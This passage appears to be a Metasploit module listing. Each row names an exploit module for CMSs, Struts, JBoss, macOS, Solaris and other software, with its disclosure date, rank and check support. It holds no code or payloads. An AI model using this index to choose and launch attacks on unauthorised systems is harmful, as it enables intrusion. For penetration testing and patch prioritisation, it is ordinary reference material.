Arbitrary JavaScript Injection Remote Code Execution + multi/http/bolt_file_upload 2015-08-17 excellent Yes CMS Bolt File Upload Vulnerability + multi/http/builderengine_upload_exec 2016-09-18 excellent Yes BuilderEngine Arbitrary File Upload Vulnerability and execution + multi/http/caidao_php_backdoor_exec 2015-10-27 excellent Yes China Chopper Caidao PHP Backdoor Code Execution + multi/http/cisco_dcnm_upload 2013-09-18 excellent Yes Cisco Prime Data Center Network Manager Arbitrary File Upload + multi/http/clipbucket_fileupload_exec 2018-03-03 excellent Yes ClipBucket beats_uploader Unauthenticated Arbitrary File Upload + multi/http/cmsms_showtime2_rce 2019-03-11 normal Yes CMS Made Simple (CMSMS) Showtime2 File Upload RCE + multi/http/cmsms_upload_rename_rce 2018-07-03 excellent Yes CMS Made Simple Authenticated RCE via File Upload/Copy + multi/http/coldfusion_ckeditor_file_upload 2018-09-11 excellent No Adobe ColdFusion CKEditor unrestricted file upload + multi/http/coldfusion_rds 2013-08-08 great Yes Adobe ColdFusion 9 Administrative Login Bypass + multi/http/cups_bash_env_exec 2014-09-24 excellent Yes CUPS Filter Bash Environment Variable Code Injection (Shellshock) + multi/http/cuteflow_upload_exec 2012-07-27 excellent Yes CuteFlow v2.11.2 Arbitrary File Upload Vulnerability + multi/http/dexter_casinoloader_exec 2014-02-08 excellent Yes Dexter (CasinoLoader) SQL Injection + multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection + multi/http/eaton_nsm_code_exec 2012-06-26 excellent Yes Network Shutdown Module (sort_values) Remote PHP Code Injection + multi/http/eventlog_file_upload 2014-08-31 excellent Yes ManageEngine Eventlog Analyzer Arbitrary File Upload + multi/http/extplorer_upload_exec 2012-12-31 excellent Yes eXtplorer v2.1 Arbitrary File Upload Vulnerability + multi/http/familycms_less_exec 2011-11-29 excellent Yes Family Connections less.php Remote Command Execution + multi/http/freenas_exec_raw 2010-11-06 great No FreeNAS exec_raw.php Arbitrary Command Execution + multi/http/gestioip_exec 2013-10-04 excellent No GestioIP Remote Command Execution + multi/http/git_client_command_exec 2014-12-18 excellent No Malicious Git and Mercurial HTTP Server For CVE-2014-9390 + multi/http/git_submodule_command_exec 2017-08-10 excellent No Malicious Git HTTP Server For CVE-2017-1000117 + multi/http/git_submodule_url_exec 2018-10-05 excellent No Malicious Git HTTP Server For CVE-2018-17456 + multi/http/gitlab_shell_exec 2013-11-04 excellent Yes Gitlab-shell Code Execution + multi/http/gitlist_arg_injection 2018-04-26 excellent Yes GitList v0.6.0 Argument Injection Vulnerability + multi/http/gitorious_graph 2012-01-19 excellent No Gitorious Arbitrary Command Execution + multi/http/glassfish_deployer 2011-08-04 excellent No Sun/Oracle GlassFish Server Authenticated Code Execution + multi/http/glossword_upload_exec 2013-02-05 excellent Yes Glossword v1.8.8 - 1.8.12 Arbitrary File Upload Vulnerability + multi/http/glpi_install_rce 2013-09-12 manual Yes GLPI install.php Remote Command Execution + multi/http/horde_href_backdoor 2012-02-13 excellent No Horde 3.3.12 Backdoor Arbitrary PHP Code Execution + multi/http/hp_sitescope_issuesiebelcmd 2013-10-30 great Yes HP SiteScope issueSiebelCmd Remote Code Execution + multi/http/hp_sitescope_uploadfileshandler 2012-08-29 good No HP SiteScope Remote Code Execution + multi/http/hp_sys_mgmt_exec 2013-06-11 excellent Yes HP System Management Homepage JustGetSNMPQueue Command Injection + multi/http/hyperic_hq_script_console 2013-10-10 excellent Yes VMware Hyperic HQ Groovy Script-Console Java Execution + multi/http/ibm_openadmin_tool_soap_welcomeserver_exec 2017-05-30 excellent Yes IBM OpenAdmin Tool SOAP welcomeServer PHP Code Execution + multi/http/ispconfig_php_exec 2013-10-30 excellent No ISPConfig Authenticated Arbitrary PHP Code Execution + multi/http/jboss_bshdeployer 2010-04-26 excellent No JBoss JMX Console Beanshell Deployer WAR Upload and Deployment + multi/http/jboss_deploymentfilerepository 2010-04-26 excellent No JBoss Java Class DeploymentFileRepository WAR Deployment + multi/http/jboss_invoke_deploy 2007-02-20 excellent Yes JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet) + multi/http/jboss_maindeployer 2007-02-20 excellent No JBoss JMX Console Deployer Upload and Execute + multi/http/jboss_seam_upload_exec 2010-08-05 normal Yes JBoss Seam 2 File Upload and Execute + multi/http/jenkins_metaprogramming 2019-01-08 excellent Yes Jenkins ACL Bypass and Metaprogramming RCE + multi/http/jenkins_script_console 2013-01-18 good Yes Jenkins-CI Script-Console Java Execution + multi/http/jenkins_xstream_deserialize 2016-02-24 excellent Yes Jenkins XStream Groovy classpath Deserialization Vulnerability + multi/http/jira_hipchat_template 2015-10-28 excellent Yes Atlassian HipChat for Jira Plugin Velocity Template Injection + multi/http/jira_plugin_upload 2018-02-22 excellent Yes Atlassian Jira Authenticated Upload Code Execution + multi/http/joomla_http_header_rce 2015-12-14 excellent Yes Joomla HTTP Header Unauthenticated Remote Code Execution + multi/http/kordil_edms_upload_exec 2013-02-22 excellent Yes Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability + multi/http/lcms_php_exec 2011-03-03 excellent Yes LotusCMS 3.0 eval() Remote Command Execution + multi/http/log1cms_ajax_create_folder 2011-04-11 excellent Yes Log1 CMS writeInfo() PHP Code Injection + multi/http/magento_unserialize 2016-05-17 excellent Yes Magento 2.0.6 Unserialize Remote Code Execution + multi/http/makoserver_cmd_exec 2017-09-03 excellent Yes Mako Server v2.5, 2.6 OS Command Injection RCE + multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent Yes ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection + multi/http/manageengine_auth_upload 2014-12-15 excellent Yes ManageEngine Multiple Products Authenticated File Upload + multi/http/manageengine_sd_uploader 2015-08-20 excellent Yes ManageEngine ServiceDesk Plus Arbitrary File Upload + multi/http/manageengine_search_sqli 2012-10-18 excellent Yes ManageEngine Security Manager Plus 5.5 Build 5505 SQL Injection + multi/http/mantisbt_manage_proj_page_rce 2008-10-16 excellent Yes Mantis manage_proj_page PHP Code Execution + multi/http/mantisbt_php_exec 2014-11-08 great Yes MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability + multi/http/mediawiki_syntaxhighlight 2017-04-06 good Yes MediaWiki SyntaxHighlight extension option injection vulnerability + multi/http/mediawiki_thumb 2014-01-28 excellent Yes MediaWiki Thumb.php Remote Command Execution + multi/http/metasploit_static_secret_key_base 2016-09-15 excellent Yes Metasploit Web UI Static secret_key_base Value + multi/http/metasploit_webui_console_command_execution 2016-08-23 excellent No Metasploit Web UI Diagnostic Console Command Execution + multi/http/mma_backdoor_upload 2012-04-02 excellent Yes Th3 MMA mma.php Backdoor Arbitrary File Upload + multi/http/mobilecartly_upload_exec 2012-08-10 excellent Yes MobileCartly 1.0 Arbitrary File Creation Vulnerability + multi/http/monstra_fileupload_exec 2017-12-18 excellent Yes Monstra CMS Authenticated Arbitrary File Upload + multi/http/moodle_cmd_exec 2013-10-30 good No Moodle Remote Command Execution + multi/http/movabletype_upgrade_exec 2013-01-07 excellent Yes Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution + multi/http/mutiny_subnetmask_exec 2012-10-22 excellent Yes Mutiny Remote Command Execution + multi/http/nas4free_php_exec 2013-10-30 great No NAS4Free Arbitrary Remote Code Execution + multi/http/navigate_cms_rce 2018-09-26 excellent Yes Navigate CMS Unauthenticated Remote Code Execution + multi/http/netwin_surgeftp_exec 2012-12-06 good Yes Netwin SurgeFTP Remote Command Execution + multi/http/nibbleblog_file_upload 2015-09-01 excellent Yes Nibbleblog File Upload Vulnerability + multi/http/novell_servicedesk_rce 2016-03-30 excellent Yes Novell ServiceDesk Authenticated File Upload + multi/http/nuuo_nvrmini_upgrade_rce 2018-08-04 excellent Yes NUUO NVRmini upgrade_handle.php Remote Command Execution + multi/http/op5_license 2012-01-05 excellent Yes OP5 license.php Remote Command Execution + multi/http/op5_welcome 2012-01-05 excellent Yes OP5 welcome Remote Command Execution + multi/http/openfire_auth_bypass 2008-11-10 excellent Yes Openfire Admin Console Authentication Bypass + multi/http/openmediavault_cmd_exec 2013-10-30 excellent No OpenMediaVault Cron Remote Command Execution + multi/http/openx_backdoor_php 2013-08-07 excellent Yes OpenX Backdoor PHP Code Execution + multi/http/opmanager_socialit_file_upload 2014-09-27 excellent Yes ManageEngine OpManager and Social IT Arbitrary File Upload + multi/http/oracle_ats_file_upload 2016-01-20 excellent Yes Oracle ATS Arbitrary File Upload + multi/http/oracle_reports_rce 2014-01-15 great Yes Oracle Forms and Reports Remote Code Execution + multi/http/oracle_weblogic_wsat_deserialization_rce 2017-10-19 excellent No Oracle WebLogic wls-wsat Component Deserialization RCE + multi/http/orientdb_exec 2017-07-13 good Yes OrientDB 2.2.x Remote Code Execution + multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution + multi/http/pandora_upload_exec 2010-11-30 excellent Yes Pandora FMS v3.1 Auth Bypass and Arbitrary File Upload Vulnerability + multi/http/phoenix_exec 2016-07-01 excellent Yes Phoenix Exploit Kit Remote Code Execution + multi/http/php_cgi_arg_injection 2012-05-03 excellent Yes PHP CGI Argument Injection + multi/http/php_utility_belt_rce 2015-12-08 excellent Yes PHP Utility Belt Remote Code Execution + multi/http/php_volunteer_upload_exec 2012-05-28 excellent No PHP Volunteer Management System v1.0.2 Arbitrary File Upload Vulnerability + multi/http/phpfilemanager_rce 2015-08-28 excellent Yes phpFileManager 0.9.8 Remote Code Execution + multi/http/phpldapadmin_query_engine 2011-10-24 excellent Yes phpLDAPadmin query_engine Remote PHP Code Injection + multi/http/phpmailer_arg_injection 2016-12-26 manual No PHPMailer Sendmail Argument Injection + multi/http/phpmoadmin_exec 2015-03-03 excellent Yes PHPMoAdmin 1.1.2 Remote Code Execution + multi/http/phpmyadmin_3522_backdoor 2012-09-25 normal No phpMyAdmin 3.5.2.2 server_sync.php Backdoor + multi/http/phpmyadmin_lfi_rce 2018-06-19 good Yes phpMyAdmin Authenticated Remote Code Execution + multi/http/phpmyadmin_null_termination_exec 2016-06-23 excellent Yes phpMyAdmin Authenticated Remote Code Execution + multi/http/phpmyadmin_preg_replace 2013-04-25 excellent Yes phpMyAdmin Authenticated Remote Code Execution via preg_replace() + multi/http/phpscheduleit_start_date 2008-10-01 excellent Yes phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection + multi/http/phptax_exec 2012-10-08 excellent Yes PhpTax pfilez Parameter Exec Remote Code Injection + multi/http/phpwiki_ploticus_exec 2014-09-11 excellent No Phpwiki Ploticus Remote Code Execution + multi/http/playsms_filename_exec 2017-05-21 excellent Yes PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution + multi/http/playsms_uploadcsv_exec 2017-05-21 excellent Yes PlaySMS import.php Authenticated CSV File Upload Code Execution + multi/http/plone_popen2 2011-10-04 excellent Yes Plone and Zope XMLTools Remote Command Execution + multi/http/pmwiki_pagelist 2011-11-09 excellent Yes PmWiki pagelist.php Remote PHP Code Injection Exploit + multi/http/polarcms_upload_exec 2012-01-21 excellent Yes PolarBear CMS PHP File Upload Vulnerability + multi/http/processmaker_exec 2013-10-24 excellent Yes ProcessMaker Open Source Authenticated PHP Code Execution + multi/http/processmaker_plugin_upload 2010-08-25 excellent No ProcessMaker Plugin Upload + multi/http/qdpm_upload_exec 2012-06-14 excellent Yes qdPM v7 Arbitrary PHP File Upload Vulnerability + multi/http/rails_actionpack_inline_exec 2016-03-01 excellent No Ruby on Rails ActionPack Inline ERB Code Execution + multi/http/rails_dynamic_render_code_exec 2016-10-16 excellent Yes Ruby on Rails Dynamic Render File Upload Remote Code Execution + multi/http/rails_json_yaml_code_exec 2013-01-28 excellent No Ruby on Rails JSON Processor YAML Deserialization Code Execution + multi/http/rails_secret_deserialization 2013-04-11 excellent No Ruby on Rails Known Secret Session Cookie Remote Code Execution + multi/http/rails_web_console_v2_code_exec 2015-06-16 excellent No Ruby on Rails Web Console (v2) Whitelist Bypass Code Execution + multi/http/rails_xml_yaml_code_exec 2013-01-07 excellent No Ruby on Rails XML Processor YAML Deserialization Code Execution + multi/http/rocket_servergraph_file_requestor_rce 2013-10-30 great Yes Rocket Servergraph Admin Center fileRequestor Remote Code Execution + multi/http/sflog_upload_exec 2012-07-06 excellent Yes Sflog! CMS 1.0 Arbitrary File Upload Vulnerability + multi/http/simple_backdoors_exec 2015-09-08 excellent Yes Simple Backdoor Shell Remote Code Execution + multi/http/sit_file_upload 2011-11-10 excellent Yes Support Incident Tracker Remote Command Execution + multi/http/snortreport_exec 2011-09-19 excellent No Snortreport nmap.php/nbtscan.php Remote Command Execution + multi/http/solarwinds_store_manager_auth_filter 2014-08-19 excellent Yes SolarWinds Storage Manager Authentication Bypass + multi/http/sonicwall_gms_upload 2012-01-17 excellent Yes SonicWALL GMS 6 Arbitrary File Upload + multi/http/sonicwall_scrutinizer_methoddetail_sqli 2014-07-24 excellent Yes Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection + multi/http/splunk_mappy_exec 2011-12-12 excellent Yes Splunk Search Remote Code Execution + multi/http/splunk_upload_app_exec 2012-09-27 good Yes Splunk Custom App Remote Code Execution + multi/http/spree_search_exec 2011-10-05 excellent No Spreecommerce 0.60.1 Arbitrary Command Execution + multi/http/spree_searchlogic_exec 2011-04-19 excellent No Spreecommerce Arbitrary Command Execution + multi/http/struts2_code_exec_showcase 2017-07-07 excellent Yes Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution + multi/http/struts2_content_type_ognl 2017-03-07 excellent Yes Apache Struts Jakarta Multipart Parser OGNL Injection + multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection + multi/http/struts2_rest_xstream 2017-09-05 excellent Yes Apache Struts 2 REST Plugin XStream RCE + multi/http/struts_code_exec 2010-07-13 good No Apache Struts Remote Command Execution + multi/http/struts_code_exec_classloader 2014-03-06 manual No Apache Struts ClassLoader Manipulation Remote Code Execution + multi/http/struts_code_exec_exception_delegator 2012-01-06 excellent No Apache Struts Remote Command Execution + multi/http/struts_code_exec_parameters 2011-10-01 excellent Yes Apache Struts ParametersInterceptor Remote Code Execution + multi/http/struts_default_action_mapper 2013-07-02 excellent Yes Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution + multi/http/struts_dev_mode 2012-01-06 excellent Yes Apache Struts 2 Developer Mode OGNL Execution + multi/http/struts_dmi_exec 2016-04-27 excellent Yes Apache Struts Dynamic Method Invocation Remote Code Execution + multi/http/struts_dmi_rest_exec 2016-06-01 excellent Yes Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution + multi/http/struts_include_params 2013-05-24 great Yes Apache Struts includeParams Remote Code Execution + multi/http/stunshell_eval 2013-03-23 great Yes STUNSHELL Web Shell Remote PHP Code Execution + multi/http/stunshell_exec 2013-03-23 great Yes STUNSHELL Web Shell Remote Code Execution + multi/http/sun_jsws_dav_options 2010-01-20 great Yes Sun Java System Web Server WebDAV OPTIONS Buffer Overflow + multi/http/sysaid_auth_file_upload 2015-06-03 excellent Yes SysAid Help Desk Administrator Portal Arbitrary File Upload + multi/http/sysaid_rdslogs_file_upload 2015-06-03 excellent Yes SysAid Help Desk 'rdslogs' Arbitrary File Upload + multi/http/testlink_upload_exec 2012-08-13 excellent Yes TestLink v1.9.3 Arbitrary File Upload Vulnerability + multi/http/tomcat_jsp_upload_bypass 2017-10-03 excellent Yes Tomcat RCE via JSP Upload Bypass + multi/http/tomcat_mgr_deploy 2009-11-09 excellent Yes Apache Tomcat Manager Application Deployer Authenticated Code Execution + multi/http/tomcat_mgr_upload 2009-11-09 excellent Yes Apache Tomcat Manager Authenticated Upload Code Execution + multi/http/traq_plugin_exec 2011-12-12 excellent Yes Traq admincp/common.php Remote Code Execution + multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi 2017-04-10 excellent Yes Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution + multi/http/uptime_file_upload_1 2013-11-19 excellent Yes Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload + multi/http/uptime_file_upload_2 2013-11-18 excellent Yes Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload + multi/http/v0pcr3w_exec 2013-03-23 great Yes v0pCr3w Web Shell Remote Code Execution + multi/http/vbseo_proc_deutf 2012-01-23 excellent Yes vBSEO proc_deutf() Remote PHP Code Injection + multi/http/vbulletin_unserialize 2015-11-04 excellent Yes vBulletin 5.1.2 Unserialize Code Execution + multi/http/visual_mining_netcharts_upload 2014-11-03 excellent Yes Visual Mining NetCharts Server Remote Code Execution + multi/http/vtiger_install_rce 2014-03-05 manual No Vtiger Install Unauthenticated Remote Command Execution + multi/http/vtiger_logo_upload_exec 2015-09-28 excellent Yes Vtiger CRM - Authenticated Logo Upload RCE + multi/http/vtiger_php_exec 2013-10-30 excellent Yes vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution + multi/http/vtiger_soap_upload 2013-03-26 excellent Yes vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload + multi/http/webnms_file_upload 2016-07-04 excellent Yes WebNMS Framework Server Arbitrary File Upload + multi/http/webpagetest_upload_exec 2012-07-13 excellent Yes WebPageTest Arbitrary PHP File Upload + multi/http/werkzeug_debug_rce 2015-06-28 excellent Yes Werkzeug Debug Shell Command Execution + multi/http/wikka_spam_exec 2011-11-30 excellent Yes WikkaWiki 1.3.2 Spam Logging PHP Injection + multi/http/wp_ninja_forms_unauthenticated_file_upload 2016-05-04 excellent Yes WordPress Ninja Forms Unauthenticated File Upload + multi/http/wp_responsive_thumbnail_slider_upload 2015-08-28 excellent Yes WordPress Responsive Thumbnail Slider Arbitrary File Upload + multi/http/x7chat2_php_exec 2014-10-27 excellent Yes X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution + multi/http/zabbix_script_exec 2013-10-30 excellent Yes Zabbix Authenticated Remote Command Execution + multi/http/zemra_panel_rce 2012-06-28 excellent Yes Zemra Botnet CnC Web Panel Remote Code Execution + multi/http/zenworks_configuration_management_upload 2015-04-07 excellent Yes Novell ZENworks Configuration Management Arbitrary File Upload + multi/http/zenworks_control_center_upload 2013-03-22 great Yes Novell ZENworks Configuration Management Remote Execution + multi/http/zpanel_information_disclosure_rce 2014-01-30 excellent No Zpanel Remote Unauthenticated RCE + multi/ids/snort_dce_rpc 2007-02-19 good No Snort 2 DCE/RPC Preprocessor Buffer Overflow + multi/local/allwinner_backdoor 2016-04-30 excellent Yes Allwinner 3.4 Legacy Kernel Local Privilege Escalation + multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc 2016-09-23 excellent Yes MagniComp SysInfo mcsiwrapper Privilege Escalation + multi/local/xorg_x11_suid_server 2018-10-25 good Yes Xorg X11 Server SUID privilege escalation + multi/misc/arkeia_agent_exec 2015-07-10 great Yes Western Digital Arkeia Remote Code Execution + multi/misc/batik_svg_java 2012-05-11 excellent No Squiggle 1.7 SVG Browser Java Code Execution + multi/misc/bmc_patrol_cmd_exec 2019-01-17 excellent No BMC Patrol Agent Privilege Escalation Cmd Execution + multi/misc/bmc_server_automation_rscd_nsh_rce 2016-03-16 excellent Yes BMC Server Automation RSCD Agent NSH Remote Command Execution + multi/misc/claymore_dual_miner_remote_manager_rce 2018-02-09 excellent Yes Nanopool Claymore Dual Miner APIs RCE + multi/misc/consul_rexec_exec 2018-08-11 excellent Yes Hashicorp Consul Remote Command Execution via Rexec + multi/misc/consul_service_exec 2018-08-11 excellent Yes Hashicorp Consul Remote Command Execution via Services API + multi/misc/erlang_cookie_rce 2009-11-20 great No Erlang Port Mapper Daemon Cookie RCE + multi/misc/hp_data_protector_exec_integutil 2014-10-02 great Yes HP Data Protector EXEC_INTEGUTIL Remote Code Execution + multi/misc/hp_vsa_exec 2011-11-11 excellent No HP StorageWorks P4000 Virtual SAN Appliance Command Execution + multi/misc/indesign_server_soap 2012-11-11 excellent Yes Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution + multi/misc/java_jdwp_debugger 2010-03-12 good Yes Java Debug Wire Protocol Remote Code Execution + multi/misc/java_jmx_server 2013-05-22 excellent Yes Java JMX Server Insecure Configuration Java Code Execution + multi/misc/java_rmi_server 2011-10-15 excellent No Java RMI Server Insecure Default Configuration Java Code Execution + multi/misc/legend_bot_exec 2015-04-27 excellent Yes Legend Perl IRC Bot Remote Code Execution + multi/misc/msf_rpc_console 2011-05-22 excellent No Metasploit RPC Console Command Execution + multi/misc/msfd_rce_remote 2018-04-11 excellent Yes Metasploit msfd Remote Code Execution + multi/misc/nodejs_v8_debugger 2016-08-15 excellent Yes NodeJS Debugger Command Injection + multi/misc/openoffice_document_macro 2017-02-08 excellent No Apache OpenOffice Text Document Malicious Macro Execution + multi/misc/openview_omniback_exec 2001-02-28 excellent Yes HP OpenView OmniBack II Command Execution + multi/misc/osgi_console_exec 2018-02-13 normal Yes Eclipse Equinoxe OSGi Console Command Execution + multi/misc/pbot_exec 2009-11-02 excellent Yes PHP IRC Bot pbot eval() Remote Code Execution + multi/misc/persistent_hpca_radexec_exec 2014-01-02 great Yes HP Client Automation Command Injection + multi/misc/ra1nx_pubcall_exec 2013-03-24 great Yes Ra1NX PHP Bot PubCall Authentication Bypass Remote Code Execution + multi/misc/teamcity_agent_xmlrpc_exec 2015-04-14 excellent Yes TeamCity Agent XML-RPC Command Execution + multi/misc/veritas_netbackup_cmdexec 2004-10-21 excellent Yes VERITAS NetBackup Remote Command Execution + multi/misc/w3tw0rk_exec 2015-06-04 excellent Yes w3tw0rk / Pitbul IRC Bot Remote Code Execution + multi/misc/weblogic_deserialize 2018-04-17 manual Yes Oracle Weblogic Server Deserialization RCE + multi/misc/weblogic_deserialize_rawobject 2015-01-28 excellent No Oracle Weblogic Server Deserialization RCE - Raw Object + multi/misc/wireshark_lwres_getaddrbyname 2010-01-27 great No Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow + multi/misc/wireshark_lwres_getaddrbyname_loop 2010-01-27 great No Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop) + multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution + multi/misc/zend_java_bridge 2011-03-28 great No Zend Server Java Bridge Arbitrary Java Code Execution + multi/mysql/mysql_udf_payload 2009-01-16 excellent No Oracle MySQL UDF Payload Execution + multi/ntp/ntp_overflow 2001-04-04 good No NTP Daemon readvar Buffer Overflow + multi/php/php_unserialize_zval_cookie 2007-03-04 average Yes PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie) + multi/php/wp_duplicator_code_inject 2018-08-29 manual Yes Snap Creek Duplicator WordPress plugin code injection + multi/postgres/postgres_createlang 2016-01-01 good Yes PostgreSQL CREATE LANGUAGE Execution + multi/realserver/describe 2002-12-20 great Yes RealServer Describe Buffer Overflow + multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow + multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution + multi/sap/sap_mgmt_con_osexec_payload 2011-03-08 excellent Yes SAP Management Console OSExecute Payload Execution + multi/sap/sap_soap_rfc_sxpg_call_system_exec 2013-03-26 great Yes SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution + multi/sap/sap_soap_rfc_sxpg_command_exec 2012-05-08 great Yes SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution + multi/script/web_delivery 2013-07-19 manual No Script Web Delivery + multi/ssh/sshexec 1999-01-01 manual No SSH User Code Execution + multi/svn/svnserve_date 2004-05-19 average No Subversion Date Svnserve + multi/upnp/libupnp_ssdp_overflow 2013-01-29 normal No Portable UPnP SDK unique_service_name() Remote Code Execution + multi/vnc/vnc_keyboard_exec 2015-07-10 great No VNC Keyboard Remote Code Execution + multi/vpn/tincd_bof 2013-04-22 average No Tincd Post-Authentication Remote TCP Stack Buffer Overflow + multi/wyse/hagent_untrusted_hsdata 2009-07-10 excellent No Wyse Rapport Hagent Fake Hserver Command Execution + netware/smb/lsass_cifs 2007-01-21 average No Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow + netware/sunrpc/pkernel_callit 2009-09-30 good No NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow + osx/afp/loginext 2004-05-03 average No AppleFileServer LoginExt PathName Overflow + osx/arkeia/type77 2005-02-18 average Yes Arkeia Backup Client Type 77 Overflow (Mac OS X) + osx/browser/adobe_flash_delete_range_tl_op 2016-04-27 great No Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion + osx/browser/mozilla_mchannel 2011-05-10 normal No Mozilla Firefox 3.6.16 mChannel Use-After-Free + osx/browser/safari_file_policy 2011-10-12 normal No Apple Safari file:// Arbitrary Code Execution + osx/browser/safari_metadata_archive 2006-02-21 excellent No Safari Archive Metadata Command Execution + osx/browser/safari_proxy_object_type_confusion 2018-03-15 manual No Safari Proxy Object Type Confusion + osx/browser/safari_user_assisted_applescript_exec 2015-10-16 manual No Safari User-Assisted Applescript Exec Attack + osx/browser/safari_user_assisted_download_launch 2014-03-10 manual No Safari User-Assisted Download and Run Attack + osx/browser/software_update 2007-12-17 excellent No Apple OS X Software Update Command Execution + osx/email/mailapp_image_exec 2006-03-01 manual No Mail.app Image Attachment Command Execution + osx/ftp/webstar_ftp_user 2004-07-13 average No WebSTAR FTP Server USER Overflow + osx/http/evocam_webserver 2010-06-01 average No MacOS X EvoCam HTTP GET Buffer Overflow + osx/local/dyld_print_to_file_root 2015-07-21 great Yes Apple OS X DYLD_PRINT_TO_FILE Privilege Escalation + osx/local/iokit_keyboard_root 2014-09-24 manual Yes Mac OS X IOKit Keyboard Driver Root Privilege Escalation + osx/local/libxpc_mitm_ssudo 2018-03-15 excellent Yes Mac OS X libxpc MITM Privilege Escalation + osx/local/nfs_mount_root 2014-04-11 normal Yes Mac OS X NFS Mount Privilege Escalation Exploit + osx/local/persistence 2012-04-01 excellent No Mac OS X Persistent Payload Installer + osx/local/root_no_password 2017-11-29 excellent No Mac OS X Root Privilege Escalation + osx/local/rootpipe 2015-04-09 great Yes Apple OS X Rootpipe Privilege Escalation + osx/local/rootpipe_entitlements 2015-07-01 great Yes Apple OS X Entitlements Rootpipe Privilege Escalation + osx/local/rsh_libmalloc 2015-10-01 normal No Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation + osx/local/setuid_tunnelblick 2012-08-11 excellent Yes Setuid Tunnelblick Privilege Escalation + osx/local/setuid_viscosity 2012-08-12 excellent Yes Viscosity setuid-set ViscosityHelper Privilege Escalation + osx/local/sudo_password_bypass 2013-02-28 normal Yes Mac OS X Sudo Password Bypass + osx/local/tpwn 2015-08-16 normal Yes Mac OS X "tpwn" Privilege Escalation + osx/local/vmware_bash_function_root 2014-09-24 normal Yes OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock) + osx/mdns/upnp_location 2007-05-25 average Yes Mac OS X mDNSResponder UPnP Location Overflow + osx/misc/ufo_ai 2009-10-28 average No UFO: Alien Invasion IRC Client Buffer Overflow + osx/rtsp/quicktime_rtsp_content_type 2007-11-23 average No MacOS X QuickTime RTSP Content-Type Overflow + osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow + osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC) + qnx/local/ifwatchd_priv_esc 2014-03-10 excellent Yes ifwatchd Privilege Escalation + qnx/qconn/qconn_exec 2012-09-04 excellent Yes QNX qconn Command Execution + solaris/dtspcd/heap_noir 2002-07-10 great Yes Solaris dtspcd Heap Overflow + solaris/local/extremeparr_dtappgather_priv_esc 2017-04-24 excellent Yes Solaris 'EXTREMEPARR' dtappgather Privilege Escalation + solaris/local/libnspr_nspr_log_file_priv_esc 2006-10-11 excellent Yes Solaris libnspr NSPR_LOG_FILE Privilege Escalation + solaris/local/rsh_stack_clash_priv_esc 2017-06-19 good Yes Solaris RSH Stack Clash Privilege Escalation + solaris/lpd/sendmail_exec 2001-08-31 excellent No Solaris LPD Command Execution + solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow + solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC) + solaris/sunrpc/sadmind_adm_build_path 2008-10-14 great No Sun Solaris sadmind adm_build_path() Buffer Overflow + solaris/sunrpc/sadmind_exec 2003-09-13 excellent No Solaris sadmind Command Execution + solaris/sunrpc/ypupdated_exec 1994-12-12 excellent No Solaris ypupdated Command Execution + solaris/telnet/fuser 2007-02-12 excellent No Sun Solaris Telnet Remote Authentication Bypass Vulnerability + solaris/telnet/ttyprompt 2002-01-18 excellent No Solaris in.telnetd TTYPROMPT Buffer Overflow + unix/dhcp/bash_environment 2014-09-24 excellent No Dhclient Bash Environment Variable Injection (Shellshock) + unix/dhcp/rhel_dhcp_client_command_injection 2018-05-15 excellent No DHCP Client Command Injection (DynoRoot) + unix/fileformat/ghostscript_type_confusion 2017-04-27 excellent No Ghostscript Type Confusion Arbitrary Command Execution + unix/fileformat/imagemagick_delegate 2016-05-03 excellent No ImageMagick Delegate Arbitrary Command Execution + unix/ftp/proftpd_133c_backdoor 2010-12-02 excellent No ProFTPD-1.3.3c Backdoor Command Execution + unix/ftp/proftpd_modcopy_exec 2015-04-22 excellent Yes ProFTPD 1.3.5 Mod_Copy Command Execution + unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution + unix/http/contentkeeperweb_mimencode 2009-02-25 excellent Yes ContentKeeper Web Remote Command Execution + 